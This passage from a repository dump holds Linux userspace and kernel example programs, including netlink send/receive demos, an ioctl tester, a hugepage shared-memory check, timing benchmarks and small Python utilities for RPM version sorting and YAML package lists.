(float)num_sent;\n\t\t\tprintf(\"%d msgs sent, %d received (not including 'stat')\\n\",\n\t\t\t\t\tnum_sent, num_rcvd);\n\t\t\tprintf(\"%f%% loss\\n\", perc_loss);\n\t\t\tfflush(stdout);\n\t\t\tfprintf(stderr, \"%d msgs sent, %d received (not including 'stat')\\n\",\n\t\t\t\t\tnum_sent, num_rcvd);\n\t\t\tfprintf(stderr, \"%f%% loss\\n\", perc_loss);\n\t\t\tfflush(stderr);\n\n\t\t\tif (o_stop)\n\t\t\t\texit(0);\n\n\t\t\t/* reset stats */\n\t\t\tnum_rcvd = 0;\n\t\t\tcur_seq = 0;\n\t\t}\n\t\telse { /* not a cmd */\n\t\t\tif (o_verify) {\n\t\t\t\tbuff[cur_size] = '\\0'; /* guarantee trailing null */\n\t\t\t\tif (cur_seq != strtol(&buff[8], NULL, 16)) {\n\t\t\t\t\tprintf(\"Expected seq %x (hex), got %s\\n\", cur_seq, &buff[8]);\n\t\t\t\t\tfflush(stdout);\n\t\t\t\t\t/* resyncronize sequence numbers in case there is loss */\n\t\t\t\t\tcur_seq = strtol(&buff[8], NULL, 16);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t++num_rcvd;\n\t\t\t++cur_seq;\n\t\t}\n\t} /* for ;; */\n\n\tCLOSESOCKET(sock);\n\n\texit(0);\n} /* main */\n\n\n\n"
},
{
"alpha_fraction": 0.5048643350601196,
"alphanum_fraction": 0.5299538969993591,
"avg_line_length": 24.6842098236084,
"blob_id": "2cbd05b4b1dfe1dea4bef6ff998f608f6f7cccfb",
"content_id": "e05b7e3fd4025d8fb63eabec0991ac57e74fa9aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1953,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 76,
"path": "/clock.cpp",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <time.h>\n#include <stdlib.h>\n \n#include <iostream>\n \nlong long getCurrentTimeMCS()\n{\n timespec t = { 0 };\n clock_gettime( CLOCK_REALTIME, &t );\n return static_cast<long long>(t.tv_sec) * static_cast<long long>(1000000)\n + static_cast<long long>(t.tv_nsec) / 1000;\n}\n \ntemplate<typename T>\nstruct sss\n{\n volatile T t1_;\n volatile T t2_;\n};\n \ntemplate<typename T>\nlong long do_loop( T number_of_iterations )\n{\n long long start = getCurrentTimeMCS();\n \n volatile sss<T> s;\n for ( T i = 0; i < number_of_iterations; ++i )\n {\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n }\n \n return getCurrentTimeMCS() - start;\n}\n \nlong long do_loop_time( int number_of_iterations )\n{\n long long start = getCurrentTimeMCS();\n \n for ( int i = 0; i < number_of_iterations; ++i )\n {\n getCurrentTimeMCS();\n }\n \n return getCurrentTimeMCS() - start;\n}\n \nint main( int argc, char* argv[] )\n{\n if ( 1 == argc )\n {\n std::cout << \"usage: perf_32_64 [number_of_iterations]\" << std::endl;\n return 127;\n }\n \n int const number_of_iterations = ::atol( argv[1] );\n \n long time1 = do_loop<int>( number_of_iterations );\n long time2 = do_loop<size_t>( number_of_iterations );\n long time3 = do_loop<double>( number_of_iterations );\n long time4 = do_loop_time( number_of_iterations );\n \n std::cout << \"number of iterations: \" << number_of_iterations << std::endl\n << \"do_loop<int>: \" << time1 << \"mcs \" << sizeof( sss<int>) << std::endl\n << \"do_loop<size_t>: \" << time2 << \"mcs \" << sizeof( sss<size_t>) << std::endl\n << \"do_loop<double>: \" << time3 << \"mcs \" << sizeof( sss<double>) << std::endl\n << \"do_loop get_time: \" << time4 << \"mcs \" << std::endl\n ;\n \n}\n\n"
},
{
"alpha_fraction": 0.6652059555053711,
"alphanum_fraction": 0.6765995025634766,
"avg_line_length": 19.745454788208008,
"blob_id": "3f40dcaa1707db9647a4897c83b8987b56c5c531",
"content_id": "bfc7b572125e5be52437e960a3eecdc7e702b35d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1141,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 55,
"path": "/nl_send_recv/nl_receive_test.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/* \t\n\tNetlink example that receives feedback from the kernel. \n\tError handling was skipped in order to reduce code length.\n\n\tCopyright Dominic Duval <[email protected]> according to the terms\n of the GNU Public License.\n\n*/\n\n#include <unistd.h>\n#include <stdio.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <asm/types.h>\n#include <linux/netlink.h>\n#include <linux/rtnetlink.h>\n\n#define MAX_PAYLOAD 1024\n#define NL_EXAMPLE 19\n#define NL_GROUP 1\n\nint read_event(int sock)\n{\n\tint ret;\n\tstruct nlmsghdr *nlh;\n\n\tnlh = (struct nlmsghdr *) malloc(NLMSG_LENGTH(MAX_PAYLOAD));\n\tmemset(nlh, 0, NLMSG_LENGTH(MAX_PAYLOAD));\n\tret = recv(sock, (void *) nlh, NLMSG_LENGTH(MAX_PAYLOAD), 0);\n\n\tprintf(\"Message size: %d , Message: %s\\n\", ret, NLMSG_DATA(nlh));\n\n\treturn 0;\n}\n\nint main(int argc, char *argv[])\n{\n\tstruct sockaddr_nl addr;\n\tint nls;\n\n\n\t/* Set up the netlink socket */\n\tnls = socket(AF_NETLINK, SOCK_RAW, NL_EXAMPLE);\n\n\tmemset((void *) &addr, 0, sizeof(addr));\n\taddr.nl_family = AF_NETLINK;\n\taddr.nl_pid = getpid();\n\taddr.nl_groups = NL_GROUP;\n\tbind(nls, (struct sockaddr *) &addr, sizeof(addr));\n\n\twhile (1)\n\t\tread_event(nls);\n\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6072607040405273,
"alphanum_fraction": 0.6204620599746704,
"avg_line_length": 19.200000762939453,
"blob_id": "665d8d2348352a91a648a464cf820a03103078c5",
"content_id": "92c114ca2fb57b449462d74578356b92610af3d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 15,
"path": "/ioctler.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/fcntl.h>\n\nint main(int argc, char *argv[]) {\n\n\tint myioctl = 0;\n\tint myfd;\n\tsscanf (argv[2], \"%d\", &myioctl);\n\tmyfd=open(argv[1],O_RDWR);\n printf(\"%u\\n\",ioctl(myfd, myioctl, NULL));\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.5438950657844543,
"alphanum_fraction": 0.5741674900054932,
"avg_line_length": 21,
"blob_id": "53dea3f6163cfdbf0e941c9bddaaddde0d64b9a8",
"content_id": "9e40e2da8ba4e807bc92acba5d25e81e5bae22f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 45,
"path": "/python/sortrpmlistbyversion.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\n# Copyright Dominic Duval <[email protected]> according to the terms\n# of the GNU Public License.\n\nimport rpm\nimport sys\n\nhave_miscutils = 0\ntry:\n from rpmUtils.miscutils import stringToVersion\n have_miscutils = 1\nexcept:\n pass\n\n\ndef rpmvercmp(rpm1, rpm2):\n (e1, v1, r1) = stringToVersion(rpm1)\n (e2, v2, r2) = stringToVersion(rpm2)\n if e1 is not None: e1 = str(e1)\n if e2 is not None: e2 = str(e2) \n rc = rpm.labelCompare((e1, v1, r1), (e2, v2, r2)) \n return rc\n\ndef usage():\n print \"\"\"\nsortrpmlistbyversion.py <file_containing_package_list>\n\"\"\"\n\ndef main():\n if len(sys.argv) > 1 and sys.argv[1] in ['-h', '--help', '-help', '--usage']:\n usage()\n sys.exit(0)\n elif len(sys.argv) == 2:\n file = open(sys.argv[1], \"r\")\n lines = file.readlines()\n lines.sort(rpmvercmp)\n for line in lines:\n sys.stdout.write( line )\n file.close()\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.647398829460144,
"alphanum_fraction": 0.647398829460144,
"avg_line_length": 18.11111068725586,
"blob_id": "9b3d9801bbc2052d7cfca6724cb32a61fb9b457e",
"content_id": "015397c37c4b3132692a1348daf2a6854af4ff9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 9,
"path": "/nl_send_recv/Makefile",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "obj-m += nl_sender.o\n\ndefault:\n\nall:\n\tmake -C/lib/modules/`uname -r`/build M=$$PWD\n\tgcc -o nl_receive_test nl_receive_test.c\nclean:\n\trm -f *.o *.ko *.mod.c nl_receive_test\n\n"
},
{
"alpha_fraction": 0.47831887006759644,
"alphanum_fraction": 0.49899932742118835,
"avg_line_length": 23.177419662475586,
"blob_id": "6695e6c93997e7d12bef8d95f2577a23d372ef56",
"content_id": "849c248f64571677bd278d5ee75fa909668b4c90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1499,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 62,
"path": "/hugepagepool.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <sys/ipc.h>\n#include <sys/shm.h>\n\n#define MB (1024 * 1024)\n\nint main (int argc, char *argv[])\n{\n int shmid, rc = 0;\n char *addr;\n unsigned long j, size = 16 * MB;\n\n if (argc > 1)\n size = atoi (argv[1]) * MB;\n\n if ((shmid = shmget (IPC_PRIVATE, size,\n 0666 | SHM_HUGETLB | IPC_CREAT)) < 0) {\n fprintf (stderr, \"Failed in shmget\");\n rc = -1;\n goto out;\n exit (-1);\n }\n\n if ((addr = shmat (shmid, (void *)0, 0))\n == (char *)-1) {\n fprintf (stderr, \"Failed to attach to shared memory\");\n rc = -1;\n goto out;\n }\n printf (\"\\nshmid %d attached at address= %p\\n\", shmid, addr);\n\n /* fill up the region */\n\n for (j = 0; j < size; j++)\n *(addr + j) = (char)j;\n printf (\"\\nOK, we packed up to %ld with integers\\n\", size);\n\n printf (\"\\nPausing 5 seconds so you can see if paegs are being used\\n\");\n sleep (30);\n\n /* check the values */\n for (j = 0; j < size; j++)\n if (*(addr + j) != (char)j) {\n printf (\"Something wrong with value at %ld\\n\", j);\n rc = -1;\n goto out;\n }\n\n printf (\"\\nOK, we checked the values, and they were OK up to %ld\\n\", j);\n\n if (shmdt ((const void *)addr)) {\n fprintf (stderr, \"Failure to detach shared memory\\n\");\n rc = -1;\n goto out;\n }\n\n out:\n shmctl (shmid, IPC_RMID, NULL);\n exit (rc);\n}\n"
},
{
"alpha_fraction": 0.3890489935874939,
"alphanum_fraction": 0.39769452810287476,
"avg_line_length": 30.454545974731445,
"blob_id": "9f1769156af13a41fa000a73df8220c7e8757492",
"content_id": "73df6eb0f97aaf8af3c3550d01ffdf7fb7cdb817",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 694,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 22,
"path": "/time.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <sys/time.h>\n\nint main (int argc, char *argv[])\n{\n struct timeval t, old, delta;\n\n while (1) {\n usleep(4000);\n gettimeofday(&t, NULL);\n if (old.tv_sec > t.tv_sec) {\n delta.tv_sec = t.tv_sec - old.tv_sec;\n delta.tv_usec = t.tv_usec - old.tv_usec;\n printf(\"Delta time: %ld %ld\\n\", delta.tv_sec,\n delta.tv_usec);\n \tprintf(\"%ld %ld\\n\", t.tv_sec, t.tv_usec);\n \tprintf(\"%ld %ld\\n\", old.tv_sec, old.tv_usec);\n }\n old = t;\n }\n return 0;\n}\n\n\n"
},
{
"alpha_fraction": 0.6796537041664124,
"alphanum_fraction": 0.6926407217979431,
"avg_line_length": 22.100000381469727,
"blob_id": "849e76e76e4fb8fd3de7f5e31fd1cb06a52aa86f",
"content_id": "324d0557523fb843a16b4b56fb8eaf559234e8d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1155,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 50,
"path": "/nl_send_recv/nl_sender.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/* \t\n\tNetlink demo that sends a message from kernel space to user space.\n\n\tCopyright Dominic Duval <[email protected]> according to the terms\n of the GNU Public License.\n\n*/\n\n#include <linux/kernel.h>\n#include <linux/module.h>\n#include <net/sock.h>\n#include <linux/netlink.h>\n\n#define MAX_PAYLOAD 1024\n#define NL_EXAMPLE 19\n#define NL_GROUP 1\n#define NETLINK_MESSAGE \"This message originated from the kernel!\"\n\nstruct sock *nl_sk = NULL;\n\n\nstatic int __init init_mod(void)\n{\n\tstruct sk_buff *skb = NULL;\n\tstruct nlmsghdr *nlh;\n\n\tnl_sk = netlink_kernel_create(NL_EXAMPLE, NULL);\n\n\tif (nl_sk == 0)\n\t\treturn -1;\n\n\tskb = alloc_skb(NLMSG_SPACE(MAX_PAYLOAD), GFP_KERNEL);\n\tnlh = (struct nlmsghdr *) skb_put(skb, NLMSG_SPACE(MAX_PAYLOAD));\n\tnlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);\n\tnlh->nlmsg_pid = 0;\n\tnlh->nlmsg_flags = 0;\n\tstrcpy(NLMSG_DATA(nlh), NETLINK_MESSAGE);\n\tNETLINK_CB(skb).pid = 0;\n\tNETLINK_CB(skb).dst_pid = 0;\n\tNETLINK_CB(skb).dst_groups = NL_GROUP;\n\n\tnetlink_broadcast(nl_sk, skb, 0, NL_GROUP, GFP_KERNEL);\n\tsock_release(nl_sk->sk_socket);\n\n\treturn -1;\t\t// Always remove module immediately after loading\n}\n\nmodule_init(init_mod);\n\nMODULE_LICENSE(\"GPL\");\n"
},
{
"alpha_fraction": 0.6096451282501221,
"alphanum_fraction": 0.6187443137168884,
"avg_line_length": 20.54901885986328,
"blob_id": "d0b01770810e6905ed71e7ddf277701cae98a149",
"content_id": "5f104ce2a2e91451234483b464e7aa85ca78a36f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 51,
"path": "/python/packageconfig.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\"\"\" Sync YAML config file for package list configuration \n\npackageconfig.py <DIR>\n\n\"\"\"\n \nimport yaml\nimport sys\nimport os\n\n# Print usage message and exit\ndef usage():\n sys.stdout = sys.stderr\n print __doc__\n sys.exit(2)\n\n# Dump package directory entries to packages.yml\ndef dirtoyaml(dir):\n\n dirlist=[]\n dircontent = os.listdir(dir)\n if verbose > 1: print 'Directory content:' , dircontent\n\n for entry in dircontent:\n if os.path.isdir(dir + '/' + entry):\n dirlist.append(entry)\n\n if verbose > 1: print 'Directories found:' , dirlist\n yamlfile=open(dir + '/packages.yml', 'w')\n yaml.dump(dirlist, yamlfile)\n return len(dirlist) \n\ndef loadpackages(dir):\n dirlist=[]\n yamlfile=open(dir + '/packages.yml', 'r')\n dirlist= yaml.load(yamlfile)\n return dirlist\n\n\ndef main(args):\n if verbose > 1 : print \"main arguments:\" , args\n if args[0] == 'load':\n print loadpackages(args[1])\n elif args[0] == 'dump':\n dirtoyaml(args[1])\n\nif __name__ == \"__main__\":\n verbose=1\n main(sys.argv[1:])\n"
}
] | 11 |
Khagar/Project-DBSCAN | https://github.com/Khagar/Project-DBSCAN | 47334e2bf5c74c2fbaf16a94f1ec7d2997a6c7ee | 4b60a5611a0f9abccff94b9f61ac107736e07fed | 4d18aaf7bbb7cc48de523f0827dc20e54ac0316c | refs/heads/master | 2021-01-20T06:20:23.265312 | 2018-12-14T11:37:20 | 2018-12-14T11:37:20 | 89,848,492 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6117084622383118,
"alphanum_fraction": 0.6493428945541382,
"avg_line_length": 36.22222137451172,
"blob_id": "b0b561e8028fab26d78aa43a4d8a653adeca041a",
"content_id": "98c51ba363d7edbe80f8593217c9caf7579bb716",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1674,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 45,
"path": "/dbscan_self_implementation_tests.py",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\n\n\ndef _distance(M,p,q):\n return np.math.sqrt(np.math.pow((M[p,0]-M[q,0]),2)+np.math.pow((M[p,1]-M[q,1]),2)) #obliczanie dystansu miedzy punktami\n\ndef _eps_neighborhood(M,p,q,eps):\n if _distance(M,p,q)==0: #zwraca false przy dystansie miedzy jednakowymi punktami np 1 i 1\n return False\n return _distance(M,p,q) < eps #jesli dystans miedzy punktami jest mniejszy niz eps to zwraca true\n\ndef _cluster(M,point,eps): #zwraca punkty dla ktorych dystans z punktu point jest mniejszy od eps\n seeds=[]\n for i in range(0, M.shape[0]):\n if _eps_neighborhood(M,point,i,eps):\n seeds.append(i)\n return seeds\n\n\nclass TestDBSCANMethods(unittest.TestCase):\n \"\"\"\n Przetestowanie funkcji uzytych w algorytmie DBSCAN. Sam algorytm DBSCAN nie zostaje przetestowany poniewaz zwraca on wykres ze stworzonymi clusterami.\n Porownanie algorytmu DBSCAN stworzonego przez nas z algorytmem DBSCAN w bibliotece scikit-learn zostanie przeprowadzone graficznie.\n \"\"\"\n def test_distance(self):\n test = _distance(np.matrix('1 1;4 5'), 0, 1)\n self.assertEquals(test, 5, 'Blad')\n\n def test_eps_neighborhood(self):\n test2 = _eps_neighborhood(np.matrix('1 1;4 5'), 0, 1, 6)\n test3 = _eps_neighborhood(np.matrix('1 1;4 5'), 0, 1, 3)\n self.assertTrue(test2)\n\n self.assertFalse(test3)\n\n def test_cluster(self):\n test4 = _cluster(np.matrix('1 1 ; 4 5 ; 2 2; 3 3'), 2, 20)\n test5 = _cluster(np.matrix('1 1 ; 4 5 ; 2 2; 3 3'), 2, 3)\n example = [0, 1, 3]\n self.assertListEqual(test4, example, 'Blad')\n\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.7223948240280151,
"alphanum_fraction": 0.7240892648696899,
"avg_line_length": 34.400001525878906,
"blob_id": "b6f9c8b105bac841129adcf44a4ebbd2bc6f07d9",
"content_id": "9d877b0968eb02a4b30cccf1668bc4da9d1636fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3633,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 100,
"path": "/README.md",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "# Project-DBSCAN\n\n### Skład zespołu:\nKarol Jasina, \nWioleta Cieślik, \nBartłomiej Góra\n\n### Opis przesłanych plików\n\ndbscan_scikit.py - Tworzy clustery dla przykładowego układu współrzędnych za pomocą algorytmu DBSCAN z biblioteki scikit-learn.\n\ndbscan_self_implementation.py - Tworzy clustery dla przykładowego układu współrzędnych za pomocą algorytmu DBSCAN zaimplementowanego przez nas.\n\ndbscan_self_implementation_tests.py - Testy jednostkowe wykorzystanych funkcji.\n\n## Uruchomienie algorytmu\n\n\t DBSCAN(M, eps, min_points)\n\t M - macierz współrzędnych w postaci M[x y]\n\t eps - maksymalny zasięg sąsiedztwa\n\t min_points - minimalna liczba punktów znajdujących się w sąsiedztwie\n\n## Porównanie wyników\n\n### Przykładowy zbiór współrzędnych dla którego porównane zostały wyniki algorytmów:\n\n\n\n### Układ współrzędnych uzyskany za pomocą DBSCAN zaimplementowanego przez nas:\n\n\n\n### Układ współrzędnych uzyskany za pomocą DBSCAN z scikit-learn:\n\n\n\n### Wnioski\nPorównując oba układy możemy stwierdzić, że wyniki uzyskane za pomocą DBSCAN zaimplementowanego przez nas są niemal identyczne co wyniki algorytmu z biblioteki scikit-learn 4 punkty nie zostały zakwalifikowane do żadnego z clusterow w przypadku naszego algorytmu, natomiast DBSCAN z scikit-learna zakwalifikował je. \nCzas wykonywania różni się za to drastycznie. Nasza implementacja wykonuje się dość długo (około 3 min) natomiast implementacja z scikit-learna wykonuje się niemal natychmiastowo.\n\t\n## Dokumentacja\n\n\tdbscan_self_implementation.distance(M, p, q)\n\t\n\tFunkcja oblicza dystans miedzy dwoma danymi punktami p i q pobierajac wspolrzedne tych punktow z macierzy M\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\tp – Pierwszy punkt\n\tq – Drugi punkt\n\t\n\tReturns:\t\n\tdystans miedzy dwoma punktami\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.eps_neighborhood(M, p, q, eps)\n\n\tFunkcja sprawdza czy dystans miedzy wybranymi punktami jest mniejszy od podanej liczby eps\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\tp – Pierwszy punkt\n\tq – Drugi punkt\n\teps – maksymalny zasieg sasiedztwa\n\t\n\tReturn True:\t\n\tw przypadku gdy dystans jest mniejszy do eps\n\tReturn False:\t\n\tw przypadku gdy dystans jest wiekszy od eps\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.cluster(M, point, eps)\n\t\n\tFunkcja zwraca tablice z wszystkimi punktami 'i' ktore znajduja sie w sasiedztwie punktu point\n\n\tParameters:\n\tM – Macierz odleglosci miedzy punktami\n\tpoint – Punkt dla ktorego szukamy punktow w sasiedztwie\n\teps – Maksymalny zasieg sasiedztwa\n\t\n\tReturn seeds:\t\n\tzwraca tablice seeds z punktami znajdujacymi sie w sasiedztwie punktu point\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.DBSCAN(M, eps, min_points)\n\n\tFunkcja uzywajac algorytmu DBSCAN przedstawia na wykresie wszystkie stworzone clustery\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\teps – Maksymalny zasieg sasiedztwa\n\tmin_points – Minimalna liczba punktow aby dany punkt byl CORE punktem\n\t\n\tReturns:\t\n\tZwraca wykres przedstawiajacy wszystkie stworzone clustery.\n\tPunkty nie nalezace do zadnego z clusterow sa zaznaczone na czarno, \n\tBORDER punkty sa zaznaczone malym zakolorowanym kolem natomiast 
CORE punkty duzym zakolorwanym kolem\n\n"
},
{
"alpha_fraction": 0.624477744102478,
"alphanum_fraction": 0.6352716088294983,
"avg_line_length": 46.875,
"blob_id": "0c19d6e28c1ff0c17008cac8cf733a9781789a9a",
"content_id": "4124a6dd622cde71ae25e91cad5e2347473f0962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5744,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 120,
"path": "/dbscan_self_implementation.py",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "from sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\nfrom pylab import *\n\n\ndef distance(M, p, q):\n \"\"\"\n Funkcja oblicza dystans miedzy dwoma danymi punktami p i q pobierajac wspolrzedne tych punktow z macierzy M\n\n :param M: Macierz odleglosci miedzy punktami\n :param p: Pierwszy punkt\n :param q: Drugi punkt\n\n :return: dystans miedzy dwoma punktami\n \"\"\"\n\n return (math.sqrt(math.pow(M[p, 0] - M[q, 0],2) + math.pow(M[p, 1] - M[q, 1],2))) # obliczanie dystansu miedzy punktami\n\n\ndef eps_neighborhood(M, p, q, eps):\n \"\"\"\n Funkcja sprawdza czy dystans miedzy wybranymi punktami jest mniejszy od podanej liczby eps\n\n :param M: Macierz odleglosci miedzy punktami\n :param p: Pierwszy punkt\n :param q: drugi punkt\n :param eps: maksymalny zasieg sasiedztwa\n\n :return True: w przypadku gdy dystans jest mniejszy do eps\n :return False: w przypadku gdy dystans jest wiekszy od eps\n \"\"\"\n if distance(M, p, q) == 0: # zwraca false przy dystansie miedzy jednakowymi punktami np 1 i 1\n return False\n return distance(M, p, q) < eps # jesli dystans miedzy punktami jest mniejszy niz eps to zwraca true\n\n\ndef cluster(M, point, eps): # zwraca punkty dla ktorych dystans z punktu point jest mniejszy od eps\n\n \"\"\"\n Funkcja zwraca tablice z wszystkimi punktami i ktore znajduja sie w sasiedztwie punktu point\n\n :param M: Macierz odleglosci miedzy punktami\n :param point: punkt dla ktorego szukamy punktow w sasiedztwie\n :param eps: maksymalny zasieg sasiedztwa\n :return seeds: zwraca tablice seeds z punktami znajdujacymi sie w sasiedztwie punktu point\n \"\"\"\n seeds = []\n for i in range(0, M.shape[0]):\n if eps_neighborhood(M, point, i, eps):\n seeds.append(i)\n return seeds\n\n\ndef DBSCAN(M, eps, min_points):\n \"\"\"\n Funkcja uzywajac algorytmu DBSCAN przedstawia na wykresie wszystkie stworzone clustery\n\n :param M: Macierz odleglosci miedzy punktami\n :param eps: maksymalny zasieg sasiedztwa\n :param min_points: Minimalna liczba punktow aby dany punkt byl CORE punktem\n\n :return: Zwraca wykres przedstawiajacy wszystkie stworzone clustery. 
Punkty nie nalezace do zadnego z clusterow sa zaznaczone na czarno, BORDER punkty sa zaznaczone malym zakolorowanym kolem natomiast CORE punkty duzym zakolorwanym kolem\n \"\"\"\n colors = ['r', 'g', 'b', 'y', 'c', 'm'] # tablica kolorow - inny kolor dla kazdego clustera\n checked = np.zeros(M.shape[\n 0]) # tablica sprawdzonych punktow wypelniona zerami jesli punkt zostal sprawdzony zmieniana jest wartosc na 1print(checked)\n classification = np.empty(M.shape[0])\n classification.fill(0)\n cluster_count = 0\n for i in range(0, len(colors)): # for odpowiedzialny do tworzenia clusterow (kazdy cluster inny kolor)\n for j in range(0, len(checked)): # szukanie pierwszego niesprawdzonego punktu\n if checked[j] != 1:\n seeds = cluster(M, j, eps)\n startpoint = j\n if min_points > len(seeds):\n checked[\n startpoint] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i nic z nim dalej nie robi bo jest do dupy\n\n if min_points <= len(seeds):\n plt.plot(M[startpoint, 0], M[startpoint, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[startpoint] = 1\n classification[startpoint] = i + 1\n break # jesli znaleziono niesprawdzony punkt wychodzi z petli\n while len(seeds) > 0:\n\n point = seeds[0] # wybranie za kolejny punkt pierwszego punktu z tablicy seeds\n results = cluster(M, point, eps) # zapisanie punktow ktore spelniaja warunek z neighborhood\n if checked[point] != 1:\n if min_points > len(results) and (classification[point] == 0 or classification[point] == -1):\n checked[\n point] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i ustala go jako border\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=8)\n classification[point] = -(i + 1)\n if min_points <= len(results):\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[point] = 1\n classification[point] = i + 1\n for k in range(0, len(results)):\n result_point = results[k]\n seeds.append(\n result_point) # dodanie do tablicy seeds punktow ktore znajdowaly sie w sasiedztwie punktu point\n seeds.remove(seeds[0]) # usuwa juz sprawdzony element z tablicy seeds\n if np.sum(checked) == M.shape[\n 0]: # jesli juz wszystkie punkty zostaly sprawdzone to wychodzi z petli - po tym wszystkie clustery powinny byc zrobione\n break\n return plt.show()\n\n# Generowanie przykladowego ukladu wspolrzednych\ncenters = [[1, 1], [-1, -1], [1, -1]]\nX, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4, random_state=0)\nX = StandardScaler().fit_transform(X)\n\n\nx, y = zip(*X)\nplt.scatter(x, y, s=5, color='black')\n\nDBSCAN(X,0.3,10)"
}
] | 3 |
hadenodom/Bulls-and-Cows | https://github.com/hadenodom/Bulls-and-Cows | 042352180e9dc645366c383bb66fd4d92dfd04c8 | c79357fe935f26af6848d43971611a2d819dcb86 | 379d818c092bed42f50166f293e53bb5a6c55ffb | refs/heads/master | 2020-12-03T02:26:39.632269 | 2019-01-30T03:53:15 | 2019-01-30T03:53:15 | 95,939,398 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7433476448059082,
"alphanum_fraction": 0.760515034198761,
"avg_line_length": 54.380950927734375,
"blob_id": "14c05acf9b705d57d86e789a3e1ad0df5dd0c748",
"content_id": "b6ffc48e181ffaf746dc5c93f6cd3e9b1beea309",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1165,
"license_type": "permissive",
"max_line_length": 283,
"num_lines": 21,
"path": "/README.md",
"repo_name": "hadenodom/Bulls-and-Cows",
"src_encoding": "UTF-8",
